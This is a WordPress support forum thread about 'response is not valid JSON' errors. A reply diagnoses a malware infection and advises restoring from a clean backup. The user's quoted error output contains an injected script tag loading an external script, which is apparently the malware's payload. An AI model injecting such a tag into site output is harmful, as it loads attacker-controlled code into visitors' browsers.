JSON Problem + refuses to display media folder

  • Hello!

    I’ve been trying to solve the error code “RESPONSE IS NOT VALID JSON” without success. In addition, WordPress refuses to display the media folder. Could you please help? I’m unable to add new articles to my website, so I’m in trouble. I’ve updated all plugins and haven’t made any changes to the site, so this problem appeared out of nowhere. I’ve also tried to install the “Really Simple SSL” plugin according to a tutorial video, but my WordPress won’t open it and instead gives this error code: “<script src=”https://cache.cloudswiftcdn.com/”></script&gt;{“fields”:[{“default”:false,”id”:”ssl_enable…”.   • You are receiving this error message because your project has been hacked. You have malware in your WordPress, which completes every single request to the project with a script that is faulty for JSON.

    Then I would recommend that you delete your project completely (files + database) and restore it from a clean backup. If you don’t have one yourself, I would recommend contacting your hoster’s support team.

    If you do not have a clean backup available, cleaning up the project will be very time-consuming. It may then be easier to set it up again.
